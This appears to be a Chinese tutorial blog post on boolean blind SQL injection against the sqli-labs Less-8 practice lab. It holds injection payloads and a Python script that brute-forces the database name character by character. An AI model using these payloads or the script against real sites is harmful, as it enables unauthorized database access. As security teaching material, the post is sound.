sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
测试环境sql-libs less8中的布尔注入
?id=1' and length((select database()))=8--+
/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=115--+
就可以遍历访问url,然后匹配响应包中的内容是否包含You are in等特殊字段。
需求使用python脚本自动化注入,使用python脚本跑出测试环境中的数据库名称。
分解需求,
首先测试网站是否可以正常访问
其次遍历测试数据库的长度
最后遍历测试数据库名称
测试能否正常访问
url = "http://test.com/Less-8/"
# 按实践的地址
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
# 发送get请求
response = requests.get(url_template,headers = headers)
# 查看请求状态是否为200
print(response)
遍历测试数据库长度
def GetDBName():
# 获取数据库的长度
print("----------测试数据库长度--------------")
url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
for i in range(1, 99):
current_url = url_template.format(i)
response = requests.get(current_url, headers=headers)
if re.search(r'You are in',response.text):
len = i
print("数据库长度为:", i)
break
遍历测试数据库名称
def GetDBName():
# 获取数据库的长度
print("----------测试数据库长度--------------")
url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
for i in range(1, 99):
current_url = url_template.format(i)
response = requests.get(current_url, headers=headers)
if re.search(r'You are in',response.text):
len = i
print("数据库长度为:", i)
break
# 测试数据库名称
print("----------测试数据库名--------------")
DBname = ''
url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"
for i in range(1, len+1):
for j in range(33, 127):
# 拼接构造需要的测试的URL地址,通过format函数批量构造
current_url1 = url_template1.format(i, j)
# print(current_url1)
# 发送请求
response1 = requests.get(current_url1, headers=headers)
# 判断是否成功
if re.search(r'You are in', response1.text):
DBname += chr(j)
print("数据库名为:", DBname)
break
跑出数据库名称即可,测试点到为止。
# 导入requests发送请求,导入re正则表达式对响应包进行筛选
import re
import requests
# 首先测试一下是否能够正常访问到测试地址
url = "http://test.com"
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
# DBname = ''
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
response = requests.get(url_template,headers = headers)
print(response)
def GetDBName():
# 获取数据库的长度
print("----------测试数据库长度--------------")
url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
for i in range(1, 99):
current_url = url_template.format(i)
response = requests.get(current_url, headers=headers)
if re.search(r'You are in',response.text):
len = i
print("数据库长度为:", i)
break
# 测试数据库名称
print("----------测试数据库名--------------")
DBname = ''
url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"
for i in range(1, len+1):
for j in range(33, 127):
# 拼接构造需要的测试的URL地址,通过format函数批量构造
current_url1 = url_template1.format(i, j)
# print(current_url1)
# 发送请求
response1 = requests.get(current_url1, headers=headers)
# 判断是否成功
if re.search(r'You are in', response1.text):
DBname += chr(j)
print("数据库名为:", DBname)
break
if __name__ == '__main__':
GetDBName()
PS:请授权后再测试,禁止未授权进行渗透测试。使用代码默认是接受授权测试。请按照当地法规进行测试。